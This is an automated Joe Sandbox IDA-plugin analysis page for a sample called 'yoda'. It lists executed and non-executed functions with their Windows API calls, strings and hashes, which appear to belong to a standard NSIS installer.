Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000,?,00000000,00401432,?,00000000,00403C7D,00000009), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779,?), ref: 00403DBB

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004049BF
GetDlgItem.USER32 ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32 ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32 ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32 ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

M, xrefs: 00404B6F
, xrefs: 00404F65
N, xrefs: 00404C32
@, xrefs: 00404BBC

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
\*.*, xrefs: 00406D2F
Delete: DeleteFile failed("%s"), xrefs: 00406E29
Delete: DeleteFile("%s"), xrefs: 00406DE8
ptF, xrefs: 00406D1A
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32 ref: 00404553
GetAsyncKeyState.USER32 ref: 0040455A
GetDlgItem.USER32 ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

